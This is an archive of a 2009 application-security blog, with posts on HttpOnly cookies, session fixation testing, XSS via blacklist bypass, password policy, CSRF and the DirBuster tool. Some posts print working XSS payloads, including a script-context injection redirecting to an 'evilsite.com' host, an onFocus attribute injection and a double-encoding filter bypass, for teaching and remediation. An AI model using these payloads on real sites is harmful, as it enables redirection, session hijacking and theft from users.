Wednesday, November 25, 2009

Tomcat and HttpOnly Session Cookies

Just wanted to let you know that Apache Tomcat can now be configured to use HttpOnly session cookies. I had forgotten about Jim Manico's crusade to get HttpOnly support into Tomcat. It is a shame that it took so long to happen. Microsoft introduced the concept of HttpOnly cookies primarily as a defense against session hijacking, where a cross-site scripting attack is used to steal a session cookie. If a web application sets a cookie with the HttpOnly attribute, web browsers do not allow client-side script to access the cookie. The first browser to support HttpOnly was Internet Explorer 6 SP1, and for a long while IE was the only browser that supported it. That has changed, as Firefox and Opera, for example, now support HttpOnly as well.

In Tomcat, enabling HttpOnly for the JSESSIONID cookie is done at the context level, which means it can be controlled for each individual web application. You simply need to add the following attribute to the <Context> element:

useHttpOnly="true"

The default is "false", so you must explicitly add the line above to implement an HttpOnly session cookie. This capability first appeared in Tomcat 6.0.19 (current version = 6.0.20) as well as Tomcat 5.5.28, which is currently the latest version in the 5.5 branch.
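For example, a web application's META-INF/context.xml might end up looking something like this (a minimal sketch; anything else shown is a placeholder):

<!-- META-INF/context.xml packaged inside the web application (minimal sketch) -->
<Context useHttpOnly="true">
    <!-- other per-application settings, if any, go here -->
</Context>

After redeploying, the Set-Cookie header for JSESSIONID should carry the HttpOnly flag.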

Wednesday, November 18, 2009

OWASP Top Ten Changing for 2010

A new version of the OWASP Top Ten will be arriving in early 2010. At the AppSec DC conference, I attended a session by OWASP board member Dave Wichers that described the proposed changes. First, the emphasis will be on risk, whereas the 2007 version focused on the most prevalent vulnerabilities. The updated list considers not just prevalence, but also the damage level that could result from successful exploitation.

The biggest changes are that Malicious File Execution and Information Leakage/Improper Error Handling are dropping off the list for 2010. In their place, Security Misconfiguration and Unvalidated Redirects/Forwards are being added. Some other items are shifting around. The chart below sums up the changes very nicely.
The release candidate of the new Top Ten is now available for download as a PDF document. OWASP is requesting feedback on anything and everything until December 31, 2009. I've not yet read the document in detail. At first glance, I wonder about the naming conventions. For example, is "Injection" descriptive enough? Is "misconfiguration" a real word? Why is "Insecure Communications" changing to the more cryptic "Insufficient Transport Layer Security"? I guess now is the time to ask!

Thursday, November 5, 2009

XSS via Cookie - How Severe?

Take a web application that sets a cookie. Now let's say the application takes the cookie value included in subsequent requests and outputs it into the HTML of the responses. Also assume this occurs with no authentication required and with no output encoding being done. Yes, this application is susceptible to reflected cross-site scripting.

I recently tested such an application. Interestingly, both HP WebInspect and Burp's active scanner reported the XSS vulnerability, but they were at opposite ends of the spectrum in terms of rating its severity. WebInspect rated it "critical" (the most severe rating), while Burp rated it as "information", which implies you don't even need to concern yourself about it.

So why the big disparity in these tools? Is it critically severe, or is it really no big deal? In my view, the answer is somewhere in between. This type of vulnerability is clearly very difficult to exploit. An attacker would somehow have to cause a victim's browser to send a script-injected cookie as part of a request to the vulnerable site. But regardless of the difficulty level, the application should properly encode the cookie value when it is written into the HTML page. Please let me know your opinion on how serious you think this type of vulnerability is.
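For illustration only, the vulnerable pattern looks something like the JSP fragment below (the "displayName" cookie and page are hypothetical, not the application I tested):

<%-- Hypothetical JSP fragment: echoes a cookie value into the page with no output encoding --%>
<%
    String displayName = "guest";
    javax.servlet.http.Cookie[] cookies = request.getCookies();
    if (cookies != null) {
        for (javax.servlet.http.Cookie c : cookies) {
            if ("displayName".equals(c.getName())) {
                displayName = c.getValue();   // attacker-influenced value
            }
        }
    }
%>
<p>Welcome back, <%= displayName %></p>   <%-- reflected XSS if the cookie contains script --%>

A cookie value containing script would execute in the victim's browser -- but only if the attacker can first plant that cookie in the victim's browser, which is exactly why the severity is debatable.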

Friday, October 16, 2009

Internet Safety for Parents

A friend asked me about Internet safety including how parents can protect children from the nasty stuff that's out there. I replied by describing what I do at home. It's probably not the perfect system, but it seems to work for me.

If you know nothing about Internet safety, start by visiting the resources listed here. Educate yourself about Internet dangers and the kinds of protection available.

In terms of filtering, I recommend using the Windows Vista built-in parental controls. You can select an age-appropriate access level, define time restrictions, view logs of sites visited, and so on. Each user must have their own login on Vista (no sharing accounts!). If you're not using Vista, please think seriously about upgrading; the parental controls feature alone is worth the money. However, at this point you should probably upgrade to Windows 7, since its release date is near. I assume it has the same or even better parental controls.

Defense in depth applies to protecting children too. So for better protection, I also recommend Blue Coat's K9 Web Protection (available for free). It is not as flexible (all users get the same filter level), but it catches some things that Vista doesn't. If you are currently stuck on Windows XP, at least use K9. Just remember it is not perfect.

Finally, if you don't want a hacker opening a reverse shell and taking over your computer, make sure you check for software updates at least weekly! Or, have it done automatically if possible. These updates should include not just Windows and Anti-Virus software, but also Internet Explorer, Adobe Reader, Flash Player, Firefox, Thunderbird, Java, iTunes, etc.

Friday, October 9, 2009

Session Fixation Example

I usually see session fixation vulnerabilities with Java web applications. Just recently I found a ColdFusion application vulnerable to session fixation. This nasty security hole greatly increases the risk that users will have their sessions hijacked. Once an attacker has hijacked a session, he can view any data or perform any action that the legitimate user can. 

Both HP WebInspect and Burp Pro's active scanner failed to find this vulnerability. Testing for session fixation is quite easy to do, so I ran a quick test for it manually.

When testing for session fixation, I normally use two different browsers: IE and Firefox in this example. If the login page for an application is https://someapp.com/login, testing for session fixation consists of the following steps:
    1. Launch Firefox and navigate directly to the login page.

    2. Inspect the cookie(s) assigned by the application. For a Java web app, a JSESSIONID cookie will normally be set. In the case of ColdFusion, you normally see CFID and CFTOKEN cookies.

    3. Copy the session ID from the cookie.

    4. Construct a special URL that contains the session ID.
    For Java, it looks like this:
    https://someapp.com/login.jsp;jsessionid=[sessid]
    For ColdFusion, it looks like this:
    https://someapp.com/login.cfm?cfid=[cfid]&cftoken=[cftoken]

    5. Open IE and configure it to run through a proxy (Burp, Paros, Fiddler2, etc.).

    6. Paste the special URL into the IE address bar and hit Enter (this step simulates a victim clicking on a link in an email or Internet post).

    7. Observe the HTTP response from the server. Is there a "Set-Cookie" header? If so, what is the session ID? You have a problem if it's the same value that's in the URL. On the other hand, you're probably okay if the value is different.
The ColdFusion site I tested was handling the situation even more poorly than usual. It was not necessary to visit the site initially to obtain legitimate session IDs from the server, so steps 1-3 above weren't even needed. An attacker could make up *any* 6-digit value for "cfid" and *any* 8-digit value for "cftoken", embed these made-up values in the malicious URL, and the application would happily accept them.

The server responded by assigning CFID and CFTOKEN cookies based on the made-up values as illustrated below.

The URL of the request was:
https://someapp.com/login.cfm?cfid=999555&cftoken=29292929

And the HTTP response contained the following headers:
Set-Cookie: CFID=999555; path=/; Secure
Set-Cookie: CFTOKEN=29292929; path=/; Secure
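
For the Java web apps where I usually see this, the standard remediation is to throw away whatever session ID the browser showed up with and issue a brand-new one when the user authenticates. A minimal sketch of a login servlet doing this (class, page, and parameter names are hypothetical):

import java.io.IOException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

public class LoginServlet extends HttpServlet {
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String username = request.getParameter("username");
        String password = request.getParameter("password");
        if (authenticate(username, password)) {
            // Discard any pre-login session; its ID may have been chosen by an attacker
            HttpSession oldSession = request.getSession(false);
            if (oldSession != null) {
                oldSession.invalidate();
            }
            // The container now issues a fresh JSESSIONID for the authenticated session
            HttpSession newSession = request.getSession(true);
            newSession.setAttribute("user", username);
            response.sendRedirect("home.jsp");
        } else {
            response.sendRedirect("login.jsp?error=1");
        }
    }

    private boolean authenticate(String username, String password) {
        return false; // placeholder for the application's real credential check
    }
}

With that in place, any session ID an attacker plants before login is worthless, because it is never promoted to an authenticated session.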

Saturday, October 3, 2009

Who Has the Answers to Your Security Questions?

I'm back after a summer that was crazy busy for me. Recently, I had two eye-opening occurrences where other people viewed the answers to my personal security questions - you know, those questions that web sites ask in case you forget your password. These incidents weren't security breaches, just normal business processes that appear to be more prevalent than I thought.

In the first incident, I got a new cell phone for my daughter at a retail store of one of the major providers. I gave the clerk my cell number so he could look up my account and he then asked for my "PIN". I didn't know it. I knew my password for their site, but that's not what he wanted (I wouldn't have told him anyway). Since I didn't know my PIN, the clerk followed up by asking me "What's the model of your first car?". Whoa. I proceeded to answer the question. He looked at his monitor and said "okay, good".

The other incident involved Vanguard again. I got locked out of their site (not just unrecognized like last time). The darn thing wouldn't even allow me to answer my security questions. Forced to call Vanguard customer service, I explained to the CSR that I was completely locked out. Wouldn't you know the CSR simply asked me to answer two of my security questions? I provided the correct answers, and he immediately unlocked my account allowing me to log in again.

Moral to the story: These answers are not simply being used programmatically or being treated as confidential data. Realize that the answers to your personal security questions could be viewed by other people in many cases.

Wednesday, June 24, 2009

Vanguard.com Doesn't "Recognize" Me

I upgraded the hard drive on my home computer. The first time I tried to log into my Vanguard account online, it asked me to answer a security question. No problem, I thought to myself. The site just doesn't recognize me since I have a new drive, so it wants extra information to be sure I'm me. This is part of the PassMark "sitekey" functionality. I typed in the answer to the question and was promptly told "sorry, invalid answer". Weird. I tried again. Same result. I was 95% sure I was entering the correct answer, but each time I tried, it didn't work. Eventually I got an email telling me that my ability to log in from an unrecognized computer had been disabled due to repeated wrong answers. Nice. The web site didn't inform me of this - only the email. The email also stated I could now log in only from a recognized computer; to log in from an unrecognized computer, I would have to reset my security questions or call Vanguard customer service. Great.

Luckily, I had logged into Vanguard from my work computer, meaning it was "recognized" and I wasn't asked a security question. Using my work computer, I logged in and reset my security questions and answers as required. Now back to my home computer. I was quite confident facing a security question this time. But again, failure! Why wouldn't it accept my answer? I was 100% sure it was correct this time. I had just reset them, for cryin' out loud.

At this point I concluded that it was a bug in Vanguard's site. Do I call their customer support? Ugh. Instead I took the approach of trying to get the site to "recognize" my home computer. Long story short, I copied a single file from my work computer to my home computer and solved the problem. I knew the PassMark/sitekey solution uses a Flash local shared object to determine whether a computer is recognized. It does not use a persistent cookie as you might first guess. Anyway, I found the shared object file "PassMark.sol" in the following directory on my work computer:

C:\Documents and Settings\[user]\Application Data\Macromedia\Flash Player\#SharedObjects\xxxxxxxx\vanguard.com\passmark\flash\pmfso.swf

where "xxxxxxxx" changes for different users. I copied PassMark.sol over to the corresponding directory on my home computer and it worked like a charm! Vanguard's site suddenly recognized my home computer and I got logged in.

This episode was very frustrating and got me wondering how normal users feel. After all, I was only able to solve the problem with:
  • Luck - I had another computer that was recognized
  • Esoteric knowledge - Vanguard's site uses Flash shared objects to recognize a computer
The vast majority of users are not web application security experts. They must be going crazy, and on the phone with support a lot.

Monday, June 8, 2009

Patent Abuse?

This is not strictly an application security post, but I just read an amazing article about a security/tech company here in Dallas. I had never heard of DeepNines, Inc. even though I live in DFW and work in the information security field. Based on the article, my first impression of DeepNines is not good. Apparently they won an $18 million settlement against McAfee because McAfee violated their patent. Their patent is "for detecting attacks on a site in a communications network and for taking actions to reduce and/or redirect such attacks". Not satisfied with their windfall, they are suing again, this time Secure Computing, which was just acquired by... McAfee. Now McAfee has to deal with them all over again!

This looks like an egregious case of patent trolling to me. How could a patent be granted for such a thing? Patents are supposed to be "nonobvious to a person having ordinary skill in the area of technology related to the invention" (ref). It's highly questionable whether that's true here. It's like patenting a steering wheel as "the process of taking an action to cause the rotation, about a vertical axis, of the front-most wheels of a vehicle, causing said vehicle to turn in a rightward or leftward direction."

One of my previous employers is dealing with something very similar. It's too bad there are companies that don't like to compete on the merits of their technology or customer service. They find it easier to acquire questionable patents and then sue the pants off anyone they see as a threat. For some companies, patent trolling actually seems to be the true business model.

Wednesday, May 27, 2009

Simultaneous Sessions for a Single User

It's a common request or recommendation that a web application not allow a user to have more than one session active at a time. In other words, after a user logs into an application, he should not be permitted to open a different type of browser (or use another computer) to log in again until his first session has ended. I've recommended this myself, but it's always been kind of muddy as to why this should be done. It is not trivial to implement this feature in the code. Recently, one of our clients wanted to better understand the reasons behind this recommendation. I was given the task of explaining.

The bottom line is that I could not find one strong, clear-cut reason for disallowing simultaneous sessions for a single user. There are a number of scenarios where it might help. Listed below are the reasons I came up with for implementing this feature. Please let me know if you have other ideas on this subject.
  • An application has a licensing scheme that allows only a limited number of concurrent users or requires users to pay for access or premium content. A technical control to prevent simultaneous sessions for a single user ID would limit the financial harm caused by users sharing login credentials.
  • It is out of the ordinary for a user to be logged in from more than one location (or more than one type of browser) at any given point in time. Anything out of the ordinary should be treated as a potential security risk.
  • An attacker somehow steals a user's credentials (perhaps by sniffing unencrypted HTTP traffic) while the user is authenticating to the application. The attacker immediately tries to log in with the stolen credentials. The application sees that the user is already logged in and returns an error to the attacker, thus temporarily protecting the account.
  • An attacker shoulder surfs to obtain a valid username (but not the password). He then immediately proceeds to run a password-guessing or dictionary attack hoping to determine the password. If his attack happens to succeed while the legitimate user is still logged in, the single-session restriction would prevent the attacker from gaining access.
  • An attacker and a victim log in such that their sessions overlap. The application displays an error message that alerts the victim that someone else is using his account. The victim may contact the site owner, spurring an investigation, which might uncover a compromised account.
  • It could help ensure data integrity and non-repudiation. A user may have multiple authenticated sessions at the same time, and one of the sessions might be used to make a critical change. If the user later claims he never made that change, it weakens the case against him when the logs show that two authenticated sessions existed while he insists he logged in only once.
  • It could help defend against a malicious user who wishes to overload the server memory by creating an excessive number of authenticated sessions. Authenticated sessions typically use much more memory on the server than unauthenticated sessions. With valid credentials and no limit to simultaneous sessions, a user could potentially create a denial-of-service condition.
After my research, I came to the conclusion that disallowing simultaneous sessions often does not increase an application's security posture enough to justify the required development and implementation cost. Obviously there are some special situations, like the licensing issue, where it could make sense.

This feature may actually introduce new problems. Let's say a user logs into an application and his machine crashes or the power goes out. A few minutes later, when trying to log in again, the user is denied access and told he's already logged in. Of course, it's true from the server's perspective (his session is still active), but now there's an angry user shouting profanities at his computer. Unless the user knows his previous session ID (fat chance), there's nothing for him to do but wait until the session expires due to inactivity or call your customer service department and complain.
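
If the feature really is needed, a "last login wins" policy sidesteps the lockout problem just described: instead of rejecting the second login, the application invalidates the older session. A minimal sketch of how that might look in a Java web app (class and method names are hypothetical, and the listener wiring is omitted):

import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import javax.servlet.http.HttpSession;

public final class SingleSessionRegistry {

    // username -> that user's currently active session
    private static final Map<String, HttpSession> ACTIVE = new ConcurrentHashMap<String, HttpSession>();

    // Call immediately after a successful login.
    public static void register(String username, HttpSession newSession) {
        HttpSession old = ACTIVE.put(username, newSession);
        if (old != null && old != newSession) {
            try {
                old.invalidate();   // kick out the earlier session ("last login wins")
            } catch (IllegalStateException e) {
                // the old session had already expired; nothing to do
            }
        }
    }

    // Call from an HttpSessionListener's sessionDestroyed() so entries don't leak.
    public static void unregister(String username, HttpSession session) {
        ACTIVE.remove(username, session);
    }
}

A licensing-driven variant would reject the new login instead of invalidating the old session, which brings back the crashed-machine problem and probably warrants an "end my other session" option on the error page.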

Monday, May 18, 2009

The Importance of Case-Sensitive Passwords

It is rare that I encounter a web application that doesn't support case-sensitive user passwords, but it still happens. In my experience this often occurs not because the application developers weren't cognizant of security, but because the authentication is actually processed by an old backend system that doesn't support case-sensitive passwords. Let's review why case-sensitive passwords are so important.

At first you might think that having case-sensitive passwords would simply double the number of possible passwords. Of course, that is not how it works. Let's say a user decides he wants a password of "orange7". Without case sensitivity, the number of possible passwords for this user is exactly one. With case sensitivity, each of the six letters can independently be upper or lower case (the digit has no case), so the user can choose from 2^6 = 64 possible passwords:

orange7 Orange7 oRange7 orAnge7 oraNge7 oranGe7
orangE7 ORange7 OrAnge7 OraNge7 OranGe7 OrangE7
oRAnge7 oRaNge7 oRanGe7 oRangE7 orANge7 orAnGe7
orAngE7 oraNGe7 oraNgE7 oranGE7 ORAnge7 OrANge7
OraNGe7 OranGE7 OrAnGe7 OrAngE7 OraNgE7 ORaNge7
ORanGe7 ORangE7 oRANge7 oRaNGe7 oRanGE7 oRAnGe7
oRAngE7 orANGe7 orAnGE7 orANgE7 oraNGE7 oRaNgE7
orANGE7 oRaNGE7 oRAnGE7 oRANgE7 oRANGe7 OraNGE7
OrAnGE7 OrANgE7 OrANGe7 ORanGE7 ORaNgE7 ORaNGe7
ORAngE7 ORAnGe7 ORANge7 oRANGE7 OrANGE7 ORaNGE7
ORAnGE7 ORANgE7 ORANGe7 ORANGE7


So, having case-sensitive passwords vastly increases the universe of possible passwords and sets the bar significantly higher for hackers running brute force or dictionary attacks on a web application. For example, 64 passwords must be checked versus only one in the scenario presented here.
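
If you want to convince yourself of the count, here is a quick sketch that enumerates every upper/lower-case variant of a given password (the class and method are hypothetical, purely for illustration):

import java.util.ArrayList;
import java.util.List;

public class CaseVariants {

    // Build every combination of upper/lower case for the letters in the password.
    public static List<String> variants(String password) {
        List<String> results = new ArrayList<String>();
        results.add("");
        for (char c : password.toCharArray()) {
            List<String> next = new ArrayList<String>();
            for (String prefix : results) {
                if (Character.isLetter(c)) {
                    next.add(prefix + Character.toLowerCase(c));
                    next.add(prefix + Character.toUpperCase(c));   // each letter doubles the count
                } else {
                    next.add(prefix + c);   // digits and symbols have no case
                }
            }
            results = next;
        }
        return results;
    }

    public static void main(String[] args) {
        // Prints 64 for "orange7": six letters, each with two cases (2^6).
        System.out.println(variants("orange7").size());
    }
}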

As an end-user, be sure to take advantage of case sensitivity to strengthen the security of your account. Use a mixture of upper and lower case letters, plus numbers. It may prevent a lazy or time-crunched attacker -- who checks lower case passwords only -- from compromising your account.

Wednesday, May 13, 2009

IE Developer Toolbar Follow-Up

In an earlier post, I had commented on the fact that the IE Developer Toolbar has a problem in that it doesn't report cookies that are marked with the "HttpOnly" attribute. Well, as they said in the movie Independence Day, that's not entirely accurate (clip). There is an exception. The exception is when the cookie is a persistent cookie. The tool apparently doesn't utilize JavaScript in that case, and correctly reports the existence of the cookie. It's not actually a situation that would occur very often. Applications normally only need to mark *sensitive* cookies with HttpOnly, and sensitive cookies should not be persistent in the first place.

Saturday, April 25, 2009

More on Blacklisting and XSS

Following up on my last post, another scenario where blacklisting of angle brackets doesn't work to stop XSS is where untrusted data is output into an existing section of script. Consider a JSP application that takes a URL parameter and outputs it within opening and closing <script> tags. If encoding is not being done, which it often isn't, then an XSS attack would be possible. An attacker would simply close the previous executable line of script with a semicolon and immediately follow that with his malicious script.

An example of how this might occur is shown below. A JSP defines a JavaScript function called "gotoPreferences()", which causes the browser to re-navigate to a URL ("prefURL"). Note that prefURL is constructed dynamically by incorporating untrusted data -- the "category" parameter.

<script type="text/javascript">
function gotoPreferences()
{
var prefURL="https://www.server.com/prefs.jsp?category=" + <%= request.getParameter("category") %> + ";"
location.href=prefURL;
}
</script>

To exploit XSS, an attacker might set the value of "category" to:

"";location.href="http://www.evilsite.com"


The resulting line in the HTML would then be:

var prefURL="https://www.server.com/prefs.jsp?category=" + "";location.href="http://www.evilsite.com";

When the function was called, the victim would be navigated to the attacker's site instead of the expected URL.
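
The defense for this pattern is encoding for the JavaScript context before the value is emitted. As a rough sketch only -- and assuming the untrusted value is placed inside a quoted string rather than concatenated bare, as above -- a hypothetical helper might look like this:

public final class JsEscaper {
    // Escape untrusted data for use inside a quoted JavaScript string (hypothetical helper).
    public static String escapeForJs(String input) {
        if (input == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(input.length());
        for (char c : input.toCharArray()) {
            switch (c) {
                case '\\': out.append("\\\\"); break;
                case '"':  out.append("\\\""); break;
                case '\'': out.append("\\'");  break;
                case '/':  out.append("\\/");  break;   // keeps "</script>" from terminating the block
                case '\r': out.append("\\r");  break;
                case '\n': out.append("\\n");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}

Usage in the JSP would then be something like:

var prefURL = "https://www.server.com/prefs.jsp?category=<%= JsEscaper.escapeForJs(request.getParameter("category")) %>";

With the quotes escaped, the attacker's payload stays inside the string and never becomes executable script.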

Thursday, April 23, 2009

Blacklisting and XSS Failures

Looking at a financial application, I was somewhat surprised to see blacklisting of angle brackets used as the main countermeasure against cross-site scripting. Stripping angle brackets or throwing an error every time you see one in a request is not sufficient protection against XSS. There were a couple of ways to exploit XSS in this application despite the rigorous rejection of angle brackets.

One attack vector was due to a page that accepted a parameter containing a relative URL to another page in the application. It ended up being a tailor-made way for someone to avoid the blacklisting altogether. When a request was received, this special page caused a forward (not a redirect) to the specified URL. The code that rejected angle brackets was hit on the request from the client only, and not when the forwarding was done. Therefore, "<" and ">" could be slipped in by double URL-encoding them in the initial request as %253C and %253E (%25 is a URL-encoded percent sign). The first decode leaves the harmless-looking %3C and %3E, which sail past the blacklist; the second decode, which happens after the filter has already run, turns them into real angle brackets.

The other XSS attack vector was via JavaScript event handlers. This technique is available when user-supplied data is output to the attribute list of a page element. This often happens for an <input> tag, where the HTML form has multiple text inputs. The user enters the data, but one or two values may be invalid, so the application returns the same page and prepopulates the values that were entered. An attacker can employ XSS by closing off the previous attribute with a double-quote (assuming double-quotes were used) and injecting an event handler such as onMouseOver, onFocus, or onClick.

An example injection is: x%22%20onFocus%3d%22alert('xss')%22%20%22. The resulting HTML might look like this:

<input type="text" name="val5" value="x" onFocus="alert('xss')" "">

Notice there were no angle brackets used in this attack, so blacklisting those characters did not provide any protection.
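
Had the application HTML-encoded the untrusted value for the attribute context instead (turning each double-quote into &quot;, ampersands into &amp;, and so on), the same injection would have landed harmlessly inside the attribute:

<input type="text" name="val5" value="x&quot; onFocus=&quot;alert('xss')&quot; &quot;">

No angle brackets appear in either the attack or the defense, which is exactly why a blacklist built around them misses this whole class of XSS.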

Friday, April 10, 2009

Just Say No to Forced Password Changes

Don't force web application users to change their passwords. Instead, require strong passwords from the outset. I feel sorry for users when I see strong password requirements combined with forced password changes after a certain time. The aggravation and inconvenience for users is not worth the trouble. In fact, for web applications, forcing password changes may actually increase the chance that passwords will be compromised. The reason lies in how a brute-force attack is done: a malevolent person with a valid username systematically tries every possible password combination hoping to get a hit. Depending on password complexity, it could take decades or longer.

Let's say the minimum password length for a web application is 8 characters, and a certain user has chosen an initial password of "muiylmo9". Now assume a slow brute-force attack on that user's account is launched, where a password of "aaaaaaaa" is tried, then "aaaaaaab", then "aaaaaaac", and so on. Some time after this attack begins, the user is forced to change his password and he chooses "aciylmo9". The result? The user's password is now more likely to be compromised earlier in the attack, because the new password comes sooner in the attacker's exhaustive search order. The user's account would have been more secure if the password had never changed. This might be a simplistic scenario, but I think it demonstrates the dubious nature of it all.

Forced password changes make more sense when passwords are stored in a file of some sort (e.g., for Apache HTTP Server or Windows) that could be stolen and cracked offline, for example with rainbow tables. If a password is cracked in that scenario, the account may still be safe if the user has since changed his password.

Friday, March 27, 2009

Forgot Password Best Practices v2

I just finished an update of my white paper that describes best practices for creating a secure "forgot password" feature. There are two important additions to the paper.
  • A section to describe an extra step that can be taken to provide even more protection. This step involves using email as an out-of-band communication channel.
  • A paragraph to explain that the recommendations may not be feasible for all web sites. The concepts presented in the paper are most relevant for organizations that have a business relationship with users.
I also dumped "Billy Bob" as the name of the hypothetical user in favor of "Joe". I grew tired of the campy name and don't want to imply that users are stupid or unsophisticated, even though some could perhaps accurately be characterized that way.

Thursday, March 12, 2009

Discover Card Subterfuge?

I've had a Discover Card for about 18 years. My account number never changed in all those years. Suddenly out of the blue, with my card expiration date many years in the future, I got a message from Discover politely informing me that I would be getting a new card with a different account number. Hmm, that's strange. The reason? I was told it's because of a "systems upgrade" giving me great benefits like "enhanced security monitoring" (see screen shot below).

I don't buy it. It's heavy on spin and doesn't pass the smell test. How does changing 12 digits in my account number (all Discover Cards start with "6011") enable such great new capabilities? I guess Discover wants me to believe that they don't have the technological know-how to transfer my existing account data into their new, powerful system. A more likely reason is that my account number was part of a data breach, and Discover decided to issue new cards to fend off any potential fraud for which they would be liable.

Friday, February 27, 2009

Getting the CSSLP

I am pleased to report that I'm now a Certified Secure Software Lifecycle Professional, or CSSLP. This is an (ISC)2 certification introduced late last year. The name doesn't exactly roll off the tongue, but my employer was kind enough to pay the $550 fee (normally $650) for me to go through the gauntlet required to get this cert. Actually, it wasn't that bad. Up until March 31, 2009, CSSLP candidates are not required to take and pass an exam. Instead, you have to submit and pass the CSSLP Experience Assessment. Essentially, this consists of submitting your current resume, writing four essays of 250-500 words each, and getting an endorsement from an (ISC)2 credential holder.

The four essays are not difficult if you have the right experience, but they were time consuming for me. I spent about an hour on each one. The essays must describe your professional experience in 4 of 7 different topic areas:
  1. Applying Security Concepts To Software Development
  2. Software Requirements
  3. Software Design
  4. Software Implementation/Coding
  5. Software Testing
  6. Software Acceptance
  7. Deployment, Operations, Maintenance And Disposal
I have experience in all of these areas, but I chose #1, #3, #4, and #5 for my essays. These topic areas correspond to the domains that make up the CSSLP Common Body of Knowledge (CBK). I'm looking forward to using my experience and knowledge in this area more as time goes on. There seems to be a nascent trend in the industry to be more proactive about developing secure applications, hence a new cert like CSSLP. I believe assessments and penetration testing will continue to be important, but introducing security elements earlier in the process is bound to pay off in more secure software. Hopefully, my new certification will pay off for my company and for me.

Thursday, February 19, 2009

DirBuster Shoots and Scores!

There's a new tool I'm using as part of my security assessments: DirBuster. Developed by James Fisher and now available from OWASP, DirBuster exists to sniff out directories and files on a web server. Nothing more and nothing less. I did not have high expectations when grabbing a copy of DirBuster from the OWASP site, and I was shocked at how many features it provides and how well it performs! Don't let the version number of 0.12 fool you. It's a very capable and polished tool.

DirBuster is written in Java (requires v1.6 or above), and the user interface is simple and intuitive. Even the look and feel is top-notch - much better than WebScarab or Burp Suite, for example, which use the default Swing look and feel. James wisely chose to use JGoodies, an open source library designed to make a more esthetically-pleasing Java user interface.

Once you start a scan, DirBuster goes to work. It lists directories and files as they are found. Since some servers don't return 404/Not Found for non-existent directories and files, DirBuster identifies positive hits by comparing each response to a base response for a known, non-existent resource.
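
For the curious, the general technique works roughly like the sketch below -- my own illustration, not DirBuster's actual code, with the target URL and threshold made up:

import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.UUID;

public class NotFoundBaseline {

    // Fetch a URL and return the response body length (error pages included).
    static int fetchLength(String url) throws IOException {
        HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
        conn.setRequestMethod("GET");
        InputStream in = conn.getResponseCode() >= 400 ? conn.getErrorStream() : conn.getInputStream();
        int total = 0;
        if (in != null) {
            byte[] buf = new byte[4096];
            int n;
            while ((n = in.read(buf)) != -1) {
                total += n;
            }
            in.close();
        }
        return total;
    }

    public static void main(String[] args) throws IOException {
        String base = "https://someapp.com/";   // made-up target
        // 1. Request a path that cannot exist to learn what "not found" looks like on this server.
        int baseline = fetchLength(base + UUID.randomUUID().toString());
        // 2. A candidate whose response differs substantially from that baseline is probably real.
        String candidate = base + "admin/";
        if (Math.abs(fetchLength(candidate) - baseline) > 50) {
            System.out.println("Possible hit: " + candidate);
        }
    }
}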
Some of the bells and whistles in DirBuster include:
  • configurable number of threads and ability to throttle up or down while a scan is running
  • ability to scan for directories, files, or both
  • file checks are done using extension(s) of your choice
  • ability to narrow a scan to a particular subdirectory
  • ability to do recursive scanning
  • ability to load payloads from a file or to configure pure brute forcing
  • customizable request headers
  • support for basic, digest, and NTLM authentication
  • fuzzing capability for resources that are referenced by URL parameter
  • ability to send traffic through a proxy
  • an informative scan status screen
  • report generation (text files)
  • automatic update feature
For such a polished tool, DirBuster has some quizzical misspellings. Another small quibble is that the tool's "advanced options" are not saved after you close it down. The author told me there is a new version in the works, and both of these issues will be addressed.

Wednesday, February 4, 2009

CSRF in Novell GroupWise WebAccess

Adrian Pastor found some nasty CSRF issues in Novell GroupWise WebAccess. The truly evil-genius one is the ability to use CSRF to create a forwarding rule in the victim's email settings, allowing an attacker to get a copy of every email the victim receives. Imagine if an executive in a company fell victim. Talk about information leakage!

The point about CSRF that many people do not understand is that you can fall victim
  • without knowing it has happened
  • without clicking a malicious link
  • without JavaScript enabled in your browser
  • even if your company has an iron-clad perimeter firewall
The vulnerabilities were responsibly disclosed and Novell has a patch available. It'd be nice to know how the remediation was done. Alas, I do not have a GroupWise system into which I could dive.
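
For what it's worth, the textbook remediation is the synchronizer token pattern. A minimal sketch of the idea in Java servlet terms (names are hypothetical; this is not Novell's actual fix):

import java.math.BigInteger;
import java.security.SecureRandom;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

public final class CsrfGuard {

    private static final SecureRandom RANDOM = new SecureRandom();

    // Called when rendering a form: store a random token in the session and embed it in a hidden field.
    public static String issueToken(HttpSession session) {
        String token = new BigInteger(130, RANDOM).toString(32);
        session.setAttribute("csrfToken", token);
        return token;
    }

    // Called before processing any state-changing request (e.g., creating a forwarding rule).
    public static boolean isValid(HttpServletRequest request) {
        String expected = (String) request.getSession().getAttribute("csrfToken");
        String submitted = request.getParameter("csrfToken");
        return expected != null && expected.equals(submitted);
    }
}

The token is emitted as a hidden field in every form that changes state and checked before the change is applied; a forged request from another site cannot supply the right value because the attacker's page cannot read the victim's token.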

Tuesday, January 20, 2009

Keeping Your RapidRez Number Safe... Not!

I went through a web application for enrolling in Budget's Fastbreak service not too long ago. Upon completing the process, they gave me a special number, called my "RapidRez" number. The final page displayed my RapidRez number and gave a warm and fuzzy message stating that "for security reasons" they won't send me an email confirmation with my number. The page looks like this:
Let's ignore the fact that the HTML is screwed up, which causes the "NTRA end" comment to be visible in Firefox. Inspection of the HTML source revealed something much more interesting and somewhat disturbing.
As you can see, my RapidRez number, which is so sensitive that Budget does not want to send it to me via email, was sent to a server called adfarm.mediaplex.com. I have no idea what, if anything, Mediaplex does with all the RapidRez numbers it is collecting. My personal opinion is that Budget should not tout the sensitive nature of these numbers and then proceed to send them to a third party. At least don't make it so obvious! If sensitive data needs to be sent to business partners, I would suggest doing it a different way, such as a nightly batch process over a secure channel.

Thursday, January 8, 2009

IE Developer Toolbar Incompatible with HttpOnly Cookies

Today I discovered that the Microsoft Internet Explorer Developer Toolbar is not able to "see" cookies marked as HttpOnly. This is illustrated in the figures below.
